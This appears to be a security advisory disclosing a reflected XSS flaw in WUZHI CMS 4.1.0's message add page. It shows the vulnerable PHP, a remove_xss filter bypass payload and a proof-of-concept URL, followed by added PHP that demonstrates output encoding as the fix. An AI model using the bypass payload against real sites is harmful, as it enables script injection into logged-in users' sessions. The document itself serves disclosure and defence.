An XSS vulnerability was discovered in WUZHI CMS 4.1.0.
There is a reflected XSS vulnerability that allows remote attackers to inject arbitrary web script or HTML via the username parameter of /index.php?m=message&f=message&v=add.
Vulnerable file: coreframe/app/message/message.php
public function add() {
    $seo_title = '发私信';
    $memberinfo = $this->memberinfo;
    if(isset($GLOBALS['submit'])) {
        ......
    } else {
        // The username query parameter is passed through remove_xss() only,
        // then handed to the template; the filter does not stop the payload below.
        $username = isset($GLOBALS['username']) ? remove_xss($GLOBALS['username']) : '';
        //$result_tpl = $this->db->get_list('message_tpl', '', '*', 0, 100, 0, 'tplid DESC');
        include T('message','add');
    }
}
The remove_xss function can be bypassed via the payload "><details/open/ontoggle=alert(1)>
PoC:
http://example.com/index.php?m=message&f=message&v=add&username="><details/open/ontoggle=alert(1)>
The payload is triggered when the user is logged in.
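The root cause is that the value is filtered with a blacklist (remove_xss) and then echoed into markup unchanged; the fix a defender applies is context-aware output encoding at the point where the template emits the value. The following is an added example, not code from WUZHI CMS: it assumes a hypothetical template that places $username in a quoted input attribute, shows the unsafe concatenation beside the encoded form, and uses DOMDocument to check that the payload quoted above no longer produces a details element.

```php
<?php
// Added example (not WUZHI CMS code). Shows output encoding as the fix for the
// reflected XSS above, independent of whatever remove_xss() does or misses.

/**
 * Encode a value for insertion into HTML text or a double-quoted attribute.
 * ENT_QUOTES escapes both " and ' so the value can never close the attribute;
 * ENT_SUBSTITUTE avoids returning '' on malformed UTF-8.
 */
function encode_for_html(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hypothetical rendering of the recipient field as the vulnerable template does it. */
function render_username_field_unsafe(string $username): string {
    return '<input type="text" name="username" value="' . $username . '">';
}

/** Same field, encoded at the output point. */
function render_username_field_safe(string $username): string {
    return '<input type="text" name="username" value="' . encode_for_html($username) . '">';
}

/**
 * Parse the fragment as a browser-like HTML parser would and verify that
 * (a) no <details> element was created and (b) exactly one <input> exists whose
 * value attribute round-trips to the original string.
 */
function is_inert(string $html, string $original): bool {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate fragment parsing warnings
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $inputs  = $doc->getElementsByTagName('input');
    $details = $doc->getElementsByTagName('details');
    return $details->length === 0
        && $inputs->length === 1
        && $inputs->item(0)->getAttribute('value') === $original; // DOM returns the decoded value
}

// Constructed input: the bypass payload quoted in the advisory.
$payload = '"><details/open/ontoggle=alert(1)>';

$unsafe = render_username_field_unsafe($payload);
$safe   = render_username_field_safe($payload);

printf("unsafe template inert: %s\n", is_inert($unsafe, $payload) ? 'yes' : 'no'); // no
printf("safe template inert:   %s\n", is_inert($safe, $payload) ? 'yes' : 'no');   // yes
echo $safe, "\n";
```

In the encoded output the quote and angle brackets become &quot;, &lt; and &gt;, so the whole payload stays inside the value attribute as text; the DOM check confirms the attribute round-trips and no new element appears. Encoding at output makes the completeness of remove_xss irrelevant, which is why a blacklist bypass like this one should be fixed in the template rather than by extending the blacklist.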